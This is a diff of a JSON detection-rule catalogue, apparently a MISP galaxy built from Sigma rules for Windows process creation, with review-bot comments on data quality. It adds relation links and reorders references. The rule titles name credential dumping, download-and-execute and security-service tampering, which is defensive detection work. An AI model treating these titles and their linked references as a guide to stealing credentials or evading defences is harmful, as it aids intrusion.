"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", "value": "Formbook Process Creation" }, 
@@ -50542,6 +65119,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9847f263-4a81-424f-970c-875dab15b79b", "value": "Suspicious TSCON Start as SYSTEM" }, @@ -50566,6 +65152,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "value": "Suspicious Extexport Execution" }, @@ -50582,9 +65177,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ @@ -50592,6 +65187,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "value": "Suspicious Msiexec Quiet Install" }, @@ -50616,6 +65220,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "value": "RunDLL32 Spawning Explorer" }, 
@@ -50686,8 +65299,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], @@ -50719,6 +65332,22 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "value": "Suspicious Spool Service Child Process" }, @@ -50745,6 +65374,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", "value": "Rundll32 UNC Path Execution" }, @@ -50769,6 +65407,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f4bbd493-b796-416e-bbf2-121235348529", "value": "Non Interactive PowerShell" }, 
@@ -50785,8 +65432,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ @@ -50798,6 +65445,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", "value": "Execution of Renamed PaExec" }, @@ -50825,6 +65488,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "value": "Esentutl Gather Credentials" }, 
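Review bot: The `refs` list of "Execution of Renamed PaExec" (proc_creation_win_renamed_paexec.yml) carries `"sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"` next to ordinary URLs; that entry is a sample hash passed through from the Sigma rule's references, not a reference a reader can follow, and it makes the element type of `refs` inconsistent for consumers that render refs as links. The line is unchanged context here and is only moved by the reorder, so this is pre-existing generator behaviour rather than something this hunk introduces. Consider having the generator keep only URL-shaped strings in `refs` and carry non-URL reference strings such as this hash under a separate meta key, so the hash is not lost but `refs` stays homogeneous.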
@@ -50841,9 +65520,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ @@ -50854,6 +65533,29 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "value": "Renamed ZOHO Dctask64" }, @@ -50870,8 +65572,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" ], "tags": [ @@ -50879,6 +65581,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "value": "Use of Remote.exe" }, 
@@ -50903,6 +65614,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", "value": "Use of OpenConsole" }, @@ -50975,6 +65695,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "221b251a-357a-49a9-920a-271802777cc0", "value": "WMI Process Reconnaissance" }, @@ -51000,6 +65729,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "value": "Ilasm Lolbin Use Compile C-Sharp" }, @@ -51024,6 +65762,15 @@ "attack.t1593.003" ] }, + "related": [ + { + "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "value": "Suspicious Git Clone" }, @@ -51049,6 +65796,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", "value": "Shell32 DLL Execution in Suspicious Directory" }, @@ -51073,6 +65829,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", "value": "Suspicious MsiExec Embedding Parent" }, 
@@ -51147,6 +65912,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48a61b29-389f-4032-b317-b30de6b95314", "value": "Suspicious Plink Port Forwarding" }, @@ -51164,10 +65938,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://vms.drweb.fr/virus/?i=24144899", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" ], "tags": [ @@ -51247,6 +66021,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", "value": "Too Long PowerShell Commandlines" }, @@ -51271,6 +66054,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", "value": "Remote File Download via Desktopimgdownldr Utility" }, 
@@ -51316,6 +66108,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", "value": "Credential Acquisition via Registry Hive Dumping" }, @@ -51340,6 +66141,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "43103702-5886-11ed-9b6a-0242ac120002", "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" }, @@ -51369,6 +66179,36 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", "value": "SquiblyTwo Execution" }, @@ -51396,6 +66236,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", "value": "Automated Collection Command Prompt" }, 
@@ -51445,6 +66294,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", "value": "Suspicious Execution of Shutdown" }, @@ -51496,6 +66354,29 @@ "cve.2019.1378" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "value": "Exploiting SetupComplete.cmd CVE-2019-1378" }, @@ -51512,15 +66393,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://twitter.com/pabraeken/status/993298228840992768", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, 
@@ -51558,8 +66448,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" ], "tags": [ @@ -51567,6 +66457,15 @@ "attack.t1614.001" ] }, + "related": [ + { + "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", "value": "CHCP CodePage Locale Lookup" }, @@ -51583,8 +66482,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" ], "tags": [ 
@@ -51595,6 +66494,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "value": "Lolbins Process Creation with WmiPrvse" }, @@ -51622,6 +66544,29 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "value": "RedMimicry Winnti Playbook Execute" }, @@ -51647,6 +66592,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" }, 
@@ -51663,10 +66617,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/nas_bench/status/1535322450858233858", + "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://twitter.com/bohops/status/1276357235954909188?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" ], "tags": [ @@ -51690,10 +66644,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" ], "tags": [ @@ -51701,6 +66655,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "value": "Suspicious AgentExecutor PowerShell Execution" }, 
@@ -51727,6 +66690,15 @@ "attack.t1220" ] }, + "related": [ + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "value": "XSL Script Processing" }, @@ -51751,6 +66723,15 @@ "attack.t1216.001" ] }, + "related": [ + { + "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "value": "Pubprn.vbs Proxy Execution" }, @@ -51800,6 +66781,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "value": "Use of Forfiles For Execution" }, @@ -51849,6 +66839,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "727454c0-d851-48b0-8b89-385611ab0704", "value": "Lolbin Unregmp2.exe Use As Proxy" }, 
@@ -51866,12 +66865,12 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://github.com/zcgonvh/NTDSDumpEx", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ @@ -51879,6 +66878,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "value": "Suspicious Process Patterns NTDS.DIT Exfil" }, 
@@ -51895,9 +66903,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], "tags": [ @@ -51905,6 +66913,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", "value": "Conti Backup Database" }, 
@@ -51921,13 +66938,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://www.cobaltstrike.com/help-opsec", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" ], "tags": [ @@ -51935,6 +66952,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" }, @@ -51959,6 +66985,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", "value": "BlueMashroom DLL Load" }, 
@@ -51976,9 +67011,9 @@ "logsource.product": "windows", "refs": [ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], "tags": "No established tags" @@ -51987,7 +67022,7 @@ "value": "CrackMapExec Command Line Flags" }, { - "description": "Use \">\" to redicrect information in commandline", + "description": "Detects use of redirection character \">\" to redicrect information in commandline", "meta": { "author": "frack113", "creation_date": "2022/01/22", @@ -52031,6 +67066,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", "value": "Cscript Visual Basic Script Execution" }, @@ -52047,8 +67091,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ 
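Review bot: The CrackMapExec entry closes with `"tags": "No established tags"`, a string where every other cluster in view carries an array of `attack.*` tags, so a consumer that maps rules to techniques by iterating `meta.tags` will iterate characters or throw on this entry. The line is context, so the shape was already there before this commit, but the patch keeps it; emit `"tags": []` or omit the key when the rule has no tags, and make the generator do that consistently rather than substituting a sentinel string.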
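Review bot: The rewritten description still reads "to redicrect information in commandline", so the one content change in this hunk carries a typo; it appears to be copied verbatim from the rule's description field, in which case the fix belongs upstream in the Sigma rule or it will be regenerated. Proposed wording: `"description": "Detects use of the redirection character \">\" to redirect information in the command line",`.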
@@ -52056,6 +67100,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", "value": "Suspicious PowerShell Download and Execute Pattern" }, @@ -52081,6 +67134,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "value": "SecurityXploded Tool" }, @@ -52098,9 +67160,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - 